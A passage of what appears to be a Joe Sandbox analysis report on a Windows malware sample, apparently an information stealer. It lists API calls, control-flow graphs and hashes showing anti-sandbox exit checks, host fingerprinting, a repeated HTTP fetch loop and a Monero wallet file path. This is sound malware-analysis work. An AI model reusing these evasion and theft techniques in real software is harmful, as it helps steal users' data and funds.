                            • Associated: 00000000.00000002.1776523266.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776733611.0000000000A6B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776905588.0000000000C0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776918486.0000000000C0C000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_560000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressProc$LibraryLoad
                            • String ID: 0X$0Z$0[$0\$0]$0^$HttpQueryInfoA$InternetSetOptionA$PW$PY$P[$P\$P]$P^$p[$p]
                            • API String ID: 2238633743-195620413
                            • Opcode ID: 73ccfb0f62956a45a56f7958145f9fc7296ef1f8b2569ef0a78cdbb1ac2da579
                            • Instruction ID: d4f2fa80a57d1116080078334592cfa13786175e9238e2f50e11cedf48eaac85
                            • Opcode Fuzzy Hash: 73ccfb0f62956a45a56f7958145f9fc7296ef1f8b2569ef0a78cdbb1ac2da579
                            • Instruction Fuzzy Hash: 9F6249B6500210FFC796DFA8ED889663BF9F7DE601704C51AA609C3264D73DA841DF2A
                            Function 00575510 Relevance: 24.9, APIs: 7, Strings: 7, Instructions: 383sleepCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1033 575510-575577 call 575ad0 call 57a820 * 3 call 57a740 * 4 1049 57557c-575583 1033->1049 1050 5755d7-57564c call 57a740 * 2 call 561590 call 5752c0 call 57a8a0 call 57a800 call 57aad0 StrCmpCA 1049->1050 1051 575585-5755b6 call 57a820 call 57a7a0 call 561590 call 5751f0 1049->1051 1077 575693-5756a9 call 57aad0 StrCmpCA 1050->1077 1080 57564e-57568e call 57a7a0 call 561590 call 5751f0 call 57a8a0 call 57a800 1050->1080 1067 5755bb-5755d2 call 57a8a0 call 57a800 1051->1067 1067->1077 1083 5756af-5756b6 1077->1083 1084 5757dc-575844 call 57a8a0 call 57a820 * 2 call 561670 call 57a800 * 4 call 576560 call 561550 1077->1084 1080->1077 1085 5756bc-5756c3 1083->1085 1086 5757da-57585f call 57aad0 StrCmpCA 1083->1086 1215 575ac3-575ac6 1084->1215 1089 5756c5-575719 call 57a820 call 57a7a0 call 561590 call 5751f0 call 57a8a0 call 57a800 1085->1089 1090 57571e-575793 call 57a740 * 2 call 561590 call 5752c0 call 57a8a0 call 57a800 call 57aad0 StrCmpCA 1085->1090 1104 575865-57586c 1086->1104 1105 575991-5759f9 call 57a8a0 call 57a820 * 2 call 561670 call 57a800 * 4 call 576560 call 561550 1086->1105 1089->1086 1090->1086 1193 575795-5757d5 call 57a7a0 call 561590 call 5751f0 call 57a8a0 call 57a800 1090->1193 1110 575872-575879 1104->1110 1111 57598f-575a14 call 57aad0 StrCmpCA 1104->1111 1105->1215 1117 5758d3-575948 call 57a740 * 2 call 561590 call 5752c0 call 57a8a0 call 57a800 call 57aad0 StrCmpCA 1110->1117 1118 57587b-5758ce call 57a820 call 57a7a0 call 561590 call 5751f0 call 57a8a0 call 57a800 1110->1118 1140 575a16-575a21 Sleep 1111->1140 1141 575a28-575a91 call 57a8a0 call 57a820 * 2 call 561670 call 57a800 * 4 call 576560 call 561550 1111->1141 1117->1111 1219 57594a-57598a call 57a7a0 call 561590 call 5751f0 call 57a8a0 call 57a800 1117->1219 1118->1111 1140->1049 1141->1215 1193->1086 1219->1111
                            APIs
                              • Part of subcall function 0057A820: lstrlen.KERNEL32(00564F05,?,?,00564F05,00580DDE), ref: 0057A82B
                              • Part of subcall function 0057A820: lstrcpy.KERNEL32(00580DDE,00000000), ref: 0057A885
                              • Part of subcall function 0057A740: lstrcpy.KERNEL32(00580E17,00000000), ref: 0057A788
                            • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00575644
                            • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 005756A1
                            • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00575857
                              • Part of subcall function 0057A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0057A7E6
                              • Part of subcall function 005751F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00575228
                              • Part of subcall function 0057A8A0: lstrcpy.KERNEL32(?,00580E17), ref: 0057A905
                              • Part of subcall function 005752C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00575318
                              • Part of subcall function 005752C0: lstrlen.KERNEL32(00000000), ref: 0057532F
                              • Part of subcall function 005752C0: StrStrA.SHLWAPI(00000000,00000000), ref: 00575364
                              • Part of subcall function 005752C0: lstrlen.KERNEL32(00000000), ref: 00575383
                              • Part of subcall function 005752C0: lstrlen.KERNEL32(00000000), ref: 005753AE
                            • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 0057578B
                            • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00575940
                            • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00575A0C
                            • Sleep.KERNEL32(0000EA60), ref: 00575A1B
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1776389225.0000000000561000.00000040.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                            • Associated: 00000000.00000002.1776376873.0000000000560000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776733611.0000000000A6B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776905588.0000000000C0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776918486.0000000000C0C000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_560000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpylstrlen$Sleep
                            • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$pZ
                            • API String ID: 507064821-1849336184
                            • Opcode ID: 2144d8ecef88bb8d07a18c77fcf026ad9be03c5d6141fc91b826367d230678ed
                            • Instruction ID: e27ed4daa1862c8c51c8648f97c72fb31df2f2f0ab1c4b576d63074681862a10
                            • Opcode Fuzzy Hash: 2144d8ecef88bb8d07a18c77fcf026ad9be03c5d6141fc91b826367d230678ed
                            • Instruction Fuzzy Hash: E2E13172910105AACB18FBB0EC5ADFD7B38BBD4300F50C528B41A66095FF746A09EB97
                            Function 00566280 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 191networkfileCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1244 566280-56630b call 57a7a0 call 5647b0 call 57a740 InternetOpenA StrCmpCA 1251 566314-566318 1244->1251 1252 56630d 1244->1252 1253 56631e-566342 InternetConnectA 1251->1253 1254 566509-566525 call 57a7a0 call 57a800 * 2 1251->1254 1252->1251 1256 5664ff-566503 InternetCloseHandle 1253->1256 1257 566348-56634c 1253->1257 1273 566528-56652d 1254->1273 1256->1254 1259 56634e-566358 1257->1259 1260 56635a 1257->1260 1262 566364-566392 HttpOpenRequestA 1259->1262 1260->1262 1264 5664f5-5664f9 InternetCloseHandle 1262->1264 1265 566398-56639c 1262->1265 1264->1256 1267 5663c5-566405 HttpSendRequestA HttpQueryInfoA 1265->1267 1268 56639e-5663bf InternetSetOptionA 1265->1268 1269 566407-566427 call 57a740 call 57a800 * 2 1267->1269 1270 56642c-56644b call 578940 1267->1270 1268->1267 1269->1273 1278 56644d-566454 1270->1278 1279 5664c9-5664e9 call 57a740 call 57a800 * 2 1270->1279 1282 566456-566480 InternetReadFile 1278->1282 1283 5664c7-5664ef InternetCloseHandle 1278->1283 1279->1273 1287 566482-566489 1282->1287 1288 56648b 1282->1288 1283->1264 1287->1288 1291 56648d-5664c5 call 57a9b0 call 57a8a0 call 57a800 1287->1291 1288->1283 1291->1282
                            APIs
                              • Part of subcall function 0057A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0057A7E6
                              • Part of subcall function 005647B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00564839
                              • Part of subcall function 005647B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00564849
                              • Part of subcall function 0057A740: lstrcpy.KERNEL32(00580E17,00000000), ref: 0057A788
                            • InternetOpenA.WININET(00580DFE,00000001,00000000,00000000,00000000), ref: 005662E1
                            • StrCmpCA.SHLWAPI(?,00E4EA18), ref: 00566303
                            • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00566335
                            • HttpOpenRequestA.WININET(00000000,GET,?,00E4E188,00000000,00000000,00400100,00000000), ref: 00566385
                            • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 005663BF
                            • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 005663D1
                            • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 005663FD
                            • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0056646D
                            • InternetCloseHandle.WININET(00000000), ref: 005664EF
                            • InternetCloseHandle.WININET(00000000), ref: 005664F9
                            • InternetCloseHandle.WININET(00000000), ref: 00566503
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1776389225.0000000000561000.00000040.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                            • Associated: 00000000.00000002.1776376873.0000000000560000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776733611.0000000000A6B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776905588.0000000000C0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776918486.0000000000C0C000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_560000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                            • String ID: ERROR$ERROR$GET
                            • API String ID: 3749127164-2509457195
                            • Opcode ID: b41f36302458dd0860c18132fcd86812faed59fbd99822b0a7e7bcde734bb25a
                            • Instruction ID: 87418f07774bcfbf4328c049b1c2e979bd5398becc1a3034dead2f40add9d35c
                            • Opcode Fuzzy Hash: b41f36302458dd0860c18132fcd86812faed59fbd99822b0a7e7bcde734bb25a
                            • Instruction Fuzzy Hash: 8C713F71A00218ABDF24DFA0DC59FEE7B78FB84701F108558F50A6B190DBB46A85DF52
                            Function 005717A0 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 162COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1301 5717a0-5717cd call 57aad0 StrCmpCA 1304 5717d7-5717f1 call 57aad0 1301->1304 1305 5717cf-5717d1 ExitProcess 1301->1305 1309 5717f4-5717f8 1304->1309 1310 5719c2-5719cd call 57a800 1309->1310 1311 5717fe-571811 1309->1311 1313 571817-57181a 1311->1313 1314 57199e-5719bd 1311->1314 1315 571835-571844 call 57a820 1313->1315 1316 571913-571924 StrCmpCA 1313->1316 1317 571932-571943 StrCmpCA 1313->1317 1318 5718f1-571902 StrCmpCA 1313->1318 1319 571951-571962 StrCmpCA 1313->1319 1320 571970-571981 StrCmpCA 1313->1320 1321 57187f-571890 StrCmpCA 1313->1321 1322 57185d-57186e StrCmpCA 1313->1322 1323 571821-571830 call 57a820 1313->1323 1324 5718cf-5718e0 StrCmpCA 1313->1324 1325 57198f-571999 call 57a820 1313->1325 1326 5718ad-5718be StrCmpCA 1313->1326 1327 571849-571858 call 57a820 1313->1327 1314->1309 1315->1314 1348 571926-571929 1316->1348 1349 571930 1316->1349 1350 571945-571948 1317->1350 1351 57194f 1317->1351 1346 571904-571907 1318->1346 1347 57190e 1318->1347 1329 571964-571967 1319->1329 1330 57196e 1319->1330 1332 571983-571986 1320->1332 1333 57198d 1320->1333 1340 571892-57189c 1321->1340 1341 57189e-5718a1 1321->1341 1338 571870-571873 1322->1338 1339 57187a 1322->1339 1323->1314 1344 5718e2-5718e5 1324->1344 1345 5718ec 1324->1345 1325->1314 1342 5718c0-5718c3 1326->1342 1343 5718ca 1326->1343 1327->1314 1329->1330 1330->1314 1332->1333 1333->1314 1338->1339 1339->1314 1355 5718a8 1340->1355 1341->1355 1342->1343 1343->1314 1344->1345 1345->1314 1346->1347 1347->1314 1348->1349 1349->1314 1350->1351 1351->1314 1355->1314
                            APIs
                            • StrCmpCA.SHLWAPI(00000000,block), ref: 005717C5
                            • ExitProcess.KERNEL32 ref: 005717D1
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1776389225.0000000000561000.00000040.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                            • Associated: 00000000.00000002.1776376873.0000000000560000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776733611.0000000000A6B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776905588.0000000000C0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776918486.0000000000C0C000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_560000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: ExitProcess
                            • String ID: block
                            • API String ID: 621844428-2199623458
                            • Opcode ID: 4c1fde11757513daadd9fd69080e69ad8b402f3850a294552defdc5dc016575a
                            • Instruction ID: 6d876357d4813d167bdfc3d247c538f38aaa79b467c59378c26774ef4715417a
                            • Opcode Fuzzy Hash: 4c1fde11757513daadd9fd69080e69ad8b402f3850a294552defdc5dc016575a
                            • Instruction Fuzzy Hash: CE5163B4A04209EFCB04DFA4E958ABE7BB5BF84704F10C448E90A77240D774E946EB56
                            Function 00577500 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 106memoryCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1356 577500-57754a GetWindowsDirectoryA 1357 577553-5775c7 GetVolumeInformationA call 578d00 * 3 1356->1357 1358 57754c 1356->1358 1365 5775d8-5775df 1357->1365 1358->1357 1366 5775e1-5775fa call 578d00 1365->1366 1367 5775fc-577617 GetProcessHeap RtlAllocateHeap 1365->1367 1366->1365 1369 577619-577626 call 57a740 1367->1369 1370 577628-577658 wsprintfA call 57a740 1367->1370 1377 57767e-57768e 1369->1377 1370->1377
                            APIs
                            • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00577542
                            • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0057757F
                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00577603
                            • RtlAllocateHeap.NTDLL(00000000), ref: 0057760A
                            • wsprintfA.USER32 ref: 00577640
                              • Part of subcall function 0057A740: lstrcpy.KERNEL32(00580E17,00000000), ref: 0057A788
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1776389225.0000000000561000.00000040.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                            • Associated: 00000000.00000002.1776376873.0000000000560000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776733611.0000000000A6B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776905588.0000000000C0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776918486.0000000000C0C000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_560000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                            • String ID: :$C$\$X
                            • API String ID: 1544550907-4153561689
                            • Opcode ID: 01fced3a57347e4487d279858f29e0a919272556fd6d130421dfaa79a484206b
                            • Instruction ID: 49f86353cb369a09f53773d54a74f9a5e058524115417ae5651a76581cc63aad
                            • Opcode Fuzzy Hash: 01fced3a57347e4487d279858f29e0a919272556fd6d130421dfaa79a484206b
                            • Instruction Fuzzy Hash: B7417FB1904258ABDB11DF94EC49BEEBBB8BF48700F108199F50967280D7786A44DBA5
                            Function 005769F0 Relevance: 9.1, APIs: 6, Instructions: 89sleepCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                              • Part of subcall function 00579860: GetProcAddress.KERNEL32(74DD0000,00E424A0), ref: 005798A1
                              • Part of subcall function 00579860: GetProcAddress.KERNEL32(74DD0000,00E423F8), ref: 005798BA
                              • Part of subcall function 00579860: GetProcAddress.KERNEL32(74DD0000,00E42230), ref: 005798D2
                              • Part of subcall function 00579860: GetProcAddress.KERNEL32(74DD0000,00E42320), ref: 005798EA
                              • Part of subcall function 00579860: GetProcAddress.KERNEL32(74DD0000,00E42410), ref: 00579903
                              • Part of subcall function 00579860: GetProcAddress.KERNEL32(74DD0000,00E49148), ref: 0057991B
                              • Part of subcall function 00579860: GetProcAddress.KERNEL32(74DD0000,00E357B0), ref: 00579933
                              • Part of subcall function 00579860: GetProcAddress.KERNEL32(74DD0000,00E35930), ref: 0057994C
                              • Part of subcall function 00579860: GetProcAddress.KERNEL32(74DD0000,00E424E8), ref: 00579964
                              • Part of subcall function 00579860: GetProcAddress.KERNEL32(74DD0000,00E422F0), ref: 0057997C
                              • Part of subcall function 00579860: GetProcAddress.KERNEL32(74DD0000,00E42350), ref: 00579995
                              • Part of subcall function 00579860: GetProcAddress.KERNEL32(74DD0000,00E424B8), ref: 005799AD
                              • Part of subcall function 00579860: GetProcAddress.KERNEL32(74DD0000,00E35810), ref: 005799C5
                              • Part of subcall function 00579860: GetProcAddress.KERNEL32(74DD0000,00E423C8), ref: 005799DE
                              • Part of subcall function 0057A740: lstrcpy.KERNEL32(00580E17,00000000), ref: 0057A788
                              • Part of subcall function 005611D0: ExitProcess.KERNEL32 ref: 00561211
                              • Part of subcall function 00561160: GetSystemInfo.KERNEL32(?), ref: 0056116A
                              • Part of subcall function 00561160: ExitProcess.KERNEL32 ref: 0056117E
                              • Part of subcall function 00561110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0056112B
                              • Part of subcall function 00561110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00561132
                              • Part of subcall function 00561110: ExitProcess.KERNEL32 ref: 00561143
                              • Part of subcall function 00561220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0056123E
                              • Part of subcall function 00561220: __aulldiv.LIBCMT ref: 00561258
                              • Part of subcall function 00561220: __aulldiv.LIBCMT ref: 00561266
                              • Part of subcall function 00561220: ExitProcess.KERNEL32 ref: 00561294
                              • Part of subcall function 00576770: GetUserDefaultLangID.KERNEL32 ref: 00576774
                              • Part of subcall function 00561190: ExitProcess.KERNEL32 ref: 005611C6
                              • Part of subcall function 00577850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,005611B7), ref: 00577880
                              • Part of subcall function 00577850: RtlAllocateHeap.NTDLL(00000000), ref: 00577887
                              • Part of subcall function 00577850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0057789F
                              • Part of subcall function 005778E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00577910
                              • Part of subcall function 005778E0: RtlAllocateHeap.NTDLL(00000000), ref: 00577917
                              • Part of subcall function 005778E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0057792F
                              • Part of subcall function 0057A9B0: lstrlen.KERNEL32(?,00E48F88,?,\Monero\wallet.keys,00580E17), ref: 0057A9C5
                              • Part of subcall function 0057A9B0: lstrcpy.KERNEL32(00000000), ref: 0057AA04
                              • Part of subcall function 0057A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0057AA12
                              • Part of subcall function 0057A8A0: lstrcpy.KERNEL32(?,00580E17), ref: 0057A905
                            • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,00E49178,?,0058110C,?,00000000,?,00581110,?,00000000,00580AEF), ref: 00576ACA
                            • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00576AE8
                            • CloseHandle.KERNEL32(00000000), ref: 00576AF9
                            • Sleep.KERNEL32(00001770), ref: 00576B04
                            • CloseHandle.KERNEL32(?,00000000,?,00E49178,?,0058110C,?,00000000,?,00581110,?,00000000,00580AEF), ref: 00576B1A
                            • ExitProcess.KERNEL32 ref: 00576B22
                            Memory Dump Source
                            • Source File: 00000000.00000002.1776389225.0000000000561000.00000040.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                            • Associated: 00000000.00000002.1776376873.0000000000560000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776733611.0000000000A6B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776905588.0000000000C0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776918486.0000000000C0C000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_560000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                            • String ID:
                            • API String ID: 2525456742-0
                            • Opcode ID: 86b75a7558462fb4bbd5490f4c75deabeedde07ea834e6943b6c1a1380e32cb9
                            • Instruction ID: 54bcae43033bf5da4f6b3ac2c3e602d9d247e3ecdd12e3e8a576095d299de05b
                            • Opcode Fuzzy Hash: 86b75a7558462fb4bbd5490f4c75deabeedde07ea834e6943b6c1a1380e32cb9
                            • Instruction Fuzzy Hash: 1F310E7190010AAADB04FBB0EC5AAFE7F78BFC5340F10C518F61AA6191DF745905E7A6
                            Function 00561220 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1436 561220-561247 call 5789b0 GlobalMemoryStatusEx 1439 561273-56127a 1436->1439 1440 561249-561271 call 57da00 * 2 1436->1440 1442 561281-561285 1439->1442 1440->1442 1443 561287 1442->1443 1444 56129a-56129d 1442->1444 1446 561292-561294 ExitProcess 1443->1446 1447 561289-561290 1443->1447 1447->1444 1447->1446
                            APIs
                            • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0056123E
                            • __aulldiv.LIBCMT ref: 00561258
                            • __aulldiv.LIBCMT ref: 00561266
                            • ExitProcess.KERNEL32 ref: 00561294
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1776389225.0000000000561000.00000040.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                            • Associated: 00000000.00000002.1776376873.0000000000560000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776733611.0000000000A6B000.00000080.00000001.01000000.00000003.sdmpDownload File
